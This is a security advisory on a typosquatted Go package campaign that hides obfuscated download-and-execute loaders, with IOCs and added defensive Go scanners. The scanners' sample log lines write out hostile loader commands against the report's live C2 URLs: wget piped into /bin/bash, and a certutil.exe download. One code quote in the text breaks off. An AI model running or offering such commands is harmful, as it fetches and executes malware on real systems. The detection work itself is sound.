Malicious Go Packages Used by Threat Actors to Deploy Obfuscated Remote Payloads
Socket’s Threat Research Team has identified eleven malicious Go packages distributed via GitHub, with ten remaining active on the Go Module Mirror, posing ongoing risks to developers and CI/CD pipelines.
Eight of these packages employ typosquatting techniques, mimicking legitimate modules to exploit namespace confusion in Go’s decentralized ecosystem, where direct imports from repositories can lead to inadvertent integration of malicious code.
Campaign Overview
The packages conceal an index-based string obfuscation routine that, at runtime, spawns a shell to download and execute second-stage payloads from interchangeable command-and-control (C2) endpoints primarily on .icu and .tech domains.
Most endpoints share the path /storage/de373d0df/a31546bf, with six still accessible, enabling threat actors to maintain on-demand access to compromised systems.
This campaign targets both Linux build servers and Windows workstations, leveraging platform-specific loaders: on Unix, it pipes wget-downloaded bash scripts directly into /bin/bash for diskless execution, while on Windows, it utilizes certutil.exe for ingress tool transfer followed by background process injection.
Observed payloads include ELF and PE binaries that enumerate host information, exfiltrate browser credentials, and establish outbound beacons, often preceded by a one-hour sleep to evade sandbox analysis.
Technical Breakdown
The obfuscation mechanism involves constructing commands from string arrays via indexed concatenation, as exemplified in github.com/expertsandba/opt, where a function assembles an exec.Command("/bin/sh", "-c",
This fetches a bash script that, after a sleep delay, downloads and executes a persistent ELF binary (SHA256: 844013025bf7c5d01e6f48df0e990103ad3c333be31f54cf5301e1463f6ca441) for filesystem enumeration and network requests.
Similar patterns appear across packages, such as github.com/weightycine/replika, which deobfuscates dual commands targeting Linux and Windows with C2s like https://infinityhel[.]icu/storage/de373d0df/a31546bf and https://infinityhel[.]icu/storage/bbb28ef04/fa31546b, the latter delivering a malicious PE executable (SHA256: 4a8bf419424ff42b736a51472d35a2c172e4c60b762c519b0b2f9eb04690726c) for credential theft.
Packages like github.com/ordinarymea/tnsr_ids and github.com/lastnymph/gouid reuse C2 infrastructure, suggesting a common threat actor, with payloads incorporating evasion via sleep (e.g., SHA256: 2b55430b90a500cb2bb9ddc530aeb1ffb8d2f8878148b7204ab7ef998d66eb9d) and exfiltration (SHA256: 42f3f9d2684328575847f3115fcd6f759cc47b0f21b3d4fea480de0f34a1e947).
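The idiom described above, paired with a detector for it, as an added example that is neither the report's code nor code from any of the listed packages. A constructed, harmless sample reassembles []string fragments by index into the command string for exec.Command("/bin/sh", "-c", ...) (here it only runs echo hello), and a go/ast scanner flags two things: a concatenation chain of three or more indexed operands, and an exec.Command call that starts a shell with -c and a command argument that is not a string literal. The sample source, the shell-name list and the three-operand threshold are assumptions for illustration.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strconv"
	"strings"
)

// sampleSource is a constructed, harmless stand-in for the loader idiom the
// report describes: []string fragments reassembled by index into the command
// string for exec.Command("/bin/sh", "-c", ...). Here it only runs `echo hello`.
const sampleSource = `package main

import "os/exec"

var parts = []string{"ec", "ho", " ", "hel", "lo"}

func build() string {
	return parts[0] + parts[1] + parts[2] + parts[3] + parts[4]
}

func run() {
	cmd := exec.Command("/bin/sh", "-c", build())
	_ = cmd.Run()
}
`

// Finding is one suspicious construct and the line it sits on.
type Finding struct {
	Line   int
	Reason string
}

// isShell reports whether a program name is a POSIX or Windows shell (assumed list).
func isShell(name string) bool {
	switch strings.ToLower(name) {
	case "/bin/sh", "/bin/bash", "sh", "bash", "cmd", "cmd.exe", "powershell", "powershell.exe":
		return true
	}
	return false
}

// countIndexed walks an a + b + c ... chain, marks each sub-expression as
// visited so it is not reported twice, and counts operands of the form s[i].
func countIndexed(e ast.Expr, seen map[ast.Node]bool) int {
	switch x := e.(type) {
	case *ast.BinaryExpr:
		if x.Op != token.ADD {
			return 0
		}
		seen[x] = true
		return countIndexed(x.X, seen) + countIndexed(x.Y, seen)
	case *ast.IndexExpr:
		return 1
	}
	return 0
}

// ScanSource parses one Go file and flags (a) concatenation chains with three
// or more indexed operands, the obfuscation idiom itself, and (b) exec.Command
// calls that start a shell with -c and a command argument that is not a plain
// string literal, i.e. one assembled at runtime.
func ScanSource(src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, "scanned.go", src, 0)
	if err != nil {
		return nil, err
	}
	seen := map[ast.Node]bool{}
	var findings []Finding
	ast.Inspect(f, func(n ast.Node) bool {
		switch x := n.(type) {
		case *ast.BinaryExpr:
			if !seen[x] && countIndexed(x, seen) >= 3 {
				findings = append(findings, Finding{fset.Position(x.Pos()).Line, "indexed string concatenation chain"})
			}
		case *ast.CallExpr:
			sel, ok := x.Fun.(*ast.SelectorExpr)
			if !ok || sel.Sel.Name != "Command" || len(x.Args) < 3 {
				return true
			}
			if pkg, ok := sel.X.(*ast.Ident); !ok || pkg.Name != "exec" {
				return true
			}
			lit, ok := x.Args[0].(*ast.BasicLit)
			if !ok || lit.Kind != token.STRING {
				return true
			}
			if prog, err := strconv.Unquote(lit.Value); err != nil || !isShell(prog) {
				return true
			}
			if _, isLit := x.Args[2].(*ast.BasicLit); !isLit {
				findings = append(findings, Finding{fset.Position(x.Pos()).Line, "shell -c with runtime-built command"})
			}
		}
		return true
	})
	return findings, nil
}

func main() {
	findings, _ := ScanSource(sampleSource)
	for _, f := range findings {
		fmt.Printf("line %d: %s\n", f.Line, f.Reason)
	}
}
```

Run with go run on the sample, or feed ScanSource the files under the module cache after go mod download. An exec.Command whose program is not a shell, or whose command string is a plain literal, is not reported, which keeps the check quiet enough to run in CI over every dependency.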
Typosquatting exacerbates risks, as seen in github.com/stripedconsu/linker mimicking github.com/logrange/linker, and github.com/cavernouskina/mcp-go imitating benign counterparts, exploiting Go’s registry ambiguities where search results often yield unrelated or low-import modules.
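A go.mod check for the collision just described, added here as an example that is not part of the report: it parses the require directives and flags every module that is not on a vetted allow-list but has the same final path element as one that is, which is exactly how github.com/stripedconsu/linker shadows github.com/logrange/linker. The comparison is case-insensitive, since module names that differ only in case (the report lists tnsr_ids and TNSR_IDS from one account) should be treated as the same name. The go.mod, its version strings and the allow-list are constructed; github.com/logrange/linker is the legitimate module named above, while github.com/mark3labs/mcp-go is an assumed stand-in for whatever module the mcp-go typosquat imitates.

```go
package main

import (
	"bufio"
	"fmt"
	"path"
	"strings"
)

// vetted is a constructed allow-list of reviewed module paths. The logrange
// entry is the legitimate module named in the report; mark3labs/mcp-go is an
// assumed stand-in for whatever module the mcp-go typosquat imitates.
var vetted = []string{
	"github.com/logrange/linker",
	"github.com/mark3labs/mcp-go",
}

// sampleGoMod is a constructed go.mod; every version string is fictitious.
const sampleGoMod = `module example.com/buildserver

require (
	github.com/stripedconsu/linker v1.0.0
	github.com/logrange/linker v0.3.0
	github.com/cavernouskina/mcp-go v1.0.0 // indirect
	golang.org/x/text v0.14.0
)

require example.com/internal/tool v0.1.0
`

// requiredModules returns module paths from block and single-line require
// directives, ignoring comments and the "// indirect" marker.
func requiredModules(gomod string) []string {
	var mods []string
	inBlock := false
	sc := bufio.NewScanner(strings.NewReader(gomod))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if i := strings.Index(line, "//"); i >= 0 {
			line = strings.TrimSpace(line[:i])
		}
		f := strings.Fields(line)
		switch {
		case len(f) == 0:
		case line == "require (":
			inBlock = true
		case line == ")":
			inBlock = false
		case f[0] == "require" && len(f) >= 3:
			mods = append(mods, f[1])
		case inBlock && len(f) >= 2:
			mods = append(mods, f[0])
		}
	}
	return mods
}

// Collision pairs a required module with the vetted module whose name it reuses.
type Collision struct {
	Required, Vetted string
}

// CheckGoMod returns, in go.mod order, each required module that is not itself
// vetted but has the same final path element (compared case-insensitively) as a
// vetted module under a different owner.
func CheckGoMod(gomod string, allow []string) []Collision {
	byName := map[string]string{}
	for _, v := range allow {
		byName[strings.ToLower(path.Base(v))] = v
	}
	var hits []Collision
	for _, m := range requiredModules(gomod) {
		if v, ok := byName[strings.ToLower(path.Base(m))]; ok && v != m {
			hits = append(hits, Collision{m, v})
		}
	}
	return hits
}

func main() {
	for _, c := range CheckGoMod(sampleGoMod, vetted) {
		fmt.Printf("%s reuses the name of vetted %s\n", c.Required, c.Vetted)
	}
}
```

The allow-list is the part that has to come from somewhere trustworthy (an internal registry or a reviewed SBOM); the check itself is deliberately narrow so that an unrelated module with a unique name produces no noise.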

Commonalities include seven C2 paths ending in /storage/de373d0df/a31546bf, uniform obfuscation, and bash-piped loaders, aligning with MITRE ATT&CK techniques such as T1059.004 (Unix Shell), T1059.003 (Windows Command Shell), T1105 (Ingress Tool Transfer, covering both the wget and the certutil.exe downloads), T1055 (Process Injection), T1027 (Obfuscated Files or Information), and T1036 (Masquerading).
According to the report, this echoes prior campaigns documented by Socket, which involved wget-based destructive payloads and malware loaders in typosquatted modules.
With packages persisting online, threat actors can rotate infrastructure, underscoring the need for proactive defenses like real-time dependency scanning, audits, and tools for detecting obfuscation and typosquatting to mitigate supply chain attacks.
Indicators of Compromise (IOCs)
The package rows below show only the GitHub account of each module path: the module name and version that followed it were mangled to "[email protected]" by e-mail obfuscation on the source page and cannot be recovered here. C2 URLs are defanged with [.].

Category | Indicator
--- | ---
Malicious package | github.com/stripedconsu/…
Malicious package | github.com/agitatedleopa/…
Malicious package | github.com/expertsandba/…
Malicious package | github.com/wetteepee/…
Malicious package | github.com/weightycine/…
Malicious package | github.com/ordinarymea/…
Malicious package | github.com/ordinarymea/…
Malicious package | github.com/cavernouskina/…
Malicious package | github.com/lastnymph/…
Malicious package | github.com/sinfulsky/…
Malicious package | github.com/briefinitia/…
C2 URL | https://nymclassic[.]tech/storage/de373d0df/a31546bf
C2 URL | https://alturastreet[.]icu/storage/de373d0df/a31546bf
C2 URL | https://monsoletter[.]icu/storage/de373d0df/a31546bf
C2 URL | https://monsoletter[.]icu/storage/de373d0df/f0eee999
C2 URL | https://carvecomi[.]fun/storage/de373d0df/a31546bf
C2 URL | https://infinityhel[.]icu/storage/de373d0df/a31546bf
C2 URL | https://infinityhel[.]icu/storage/bbb28ef04/fa31546b
C2 URL | https://kaiaflow[.]icu/storage/de373d0df/a31546bf
C2 URL | https://kaiaflow[.]icu/storage/bbb28ef04/fa31546b
C2 URL | https://kavarecent[.]icu/storage/de373d0df/a31546bf
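To run the indicators above and the loader behaviour from the campaign overview against logs, an added example that is not part of the report: each line is checked against the exact C2 URLs (refanged), against the shared /storage/<9 hex>/<8 hex> path shape on the .icu, .tech and .fun domains so that a rotated host is still caught, and against the two loader patterns, wget output piped into a shell and certutil.exe used as a downloader. The log lines, hosts, client addresses and exact command lines (including the certutil.exe -urlcache form) are constructed; only the C2 URLs come from the IOC table.

```go
package main

import (
	"fmt"
	"regexp"
)

// knownC2 holds the report's C2 URLs, refanged so they can be matched
// verbatim against log lines. Nothing here contacts these hosts.
var knownC2 = map[string]bool{
	"https://nymclassic.tech/storage/de373d0df/a31546bf":  true,
	"https://alturastreet.icu/storage/de373d0df/a31546bf": true,
	"https://monsoletter.icu/storage/de373d0df/a31546bf":  true,
	"https://monsoletter.icu/storage/de373d0df/f0eee999":  true,
	"https://carvecomi.fun/storage/de373d0df/a31546bf":    true,
	"https://infinityhel.icu/storage/de373d0df/a31546bf":  true,
	"https://infinityhel.icu/storage/bbb28ef04/fa31546b":  true,
	"https://kaiaflow.icu/storage/de373d0df/a31546bf":     true,
	"https://kaiaflow.icu/storage/bbb28ef04/fa31546b":     true,
	"https://kavarecent.icu/storage/de373d0df/a31546bf":   true,
}

var (
	// The shared path shape (/storage/<9 hex>/<8 hex>) on the TLDs the campaign
	// used; this catches rotated hosts that the exact list misses.
	c2PathRe = regexp.MustCompile(`https?://[^\s/]+\.(?:icu|tech|fun)/storage/[0-9a-f]{9}/[0-9a-f]{8}\b`)
	// wget output piped straight into a shell (the Unix loader).
	wgetPipeRe = regexp.MustCompile(`\bwget\b[^|]*\|\s*(?:/bin/)?(?:ba)?sh\b`)
	// certutil used as a downloader (assumed -urlcache form of the Windows loader).
	certutilRe = regexp.MustCompile(`(?i)\bcertutil(?:\.exe)?\b.*-urlcache`)
)

// sampleLogs are constructed proxy ("proxy <client> <method> <url>") and
// process-creation ("proc <host> <command line>") records. Hosts, clients and
// command lines are invented; only the C2 URLs come from the report.
var sampleLogs = []string{
	"proxy 10.0.4.12 GET https://kaiaflow.icu/storage/de373d0df/a31546bf",
	"proxy 10.0.4.12 GET https://monsoletter.icu/storage/de373d0df/f0eee999",
	"proxy 10.0.4.20 GET https://proxy.golang.org/github.com/logrange/linker/@v/list",
	"proc build-01 /bin/sh -c wget -qO- https://alturastreet.icu/storage/de373d0df/a31546bf | /bin/bash",
	"proc ws-07 cmd.exe /c certutil.exe -urlcache -split -f https://infinityhel.icu/storage/bbb28ef04/fa31546b C:\\Users\\Public\\u.exe",
	"proxy 10.0.4.30 GET https://rotated-host.icu/storage/de373d0df/a31546bf",
	"proc build-02 /bin/sh -c go build ./...",
}

// Hit is one flagged log line and the rules it tripped.
type Hit struct {
	Index int
	Tags  []string
}

// Classify returns the rule tags a single log line matches, in a fixed order.
func Classify(line string) []string {
	var tags []string
	if u := c2PathRe.FindString(line); u != "" {
		tags = append(tags, "c2-path-pattern")
		if knownC2[u] {
			tags = append(tags, "known-c2-ioc")
		}
	}
	if wgetPipeRe.MatchString(line) {
		tags = append(tags, "wget-pipe-to-shell")
	}
	if certutilRe.MatchString(line) {
		tags = append(tags, "certutil-urlcache")
	}
	return tags
}

// ScanLogs runs Classify over every line and keeps the ones that matched.
func ScanLogs(lines []string) []Hit {
	var hits []Hit
	for i, l := range lines {
		if tags := Classify(l); len(tags) > 0 {
			hits = append(hits, Hit{i, tags})
		}
	}
	return hits
}

func main() {
	for _, h := range ScanLogs(sampleLogs) {
		fmt.Printf("line %d: %v\n", h.Index, h.Tags)
	}
}
```

The path-shape rule is the one that keeps paying off after the listed hosts go dark: a line that matches it without the known-c2-ioc tag is a candidate for a new host on the same infrastructure and is worth pivoting on before it is added to the exact list.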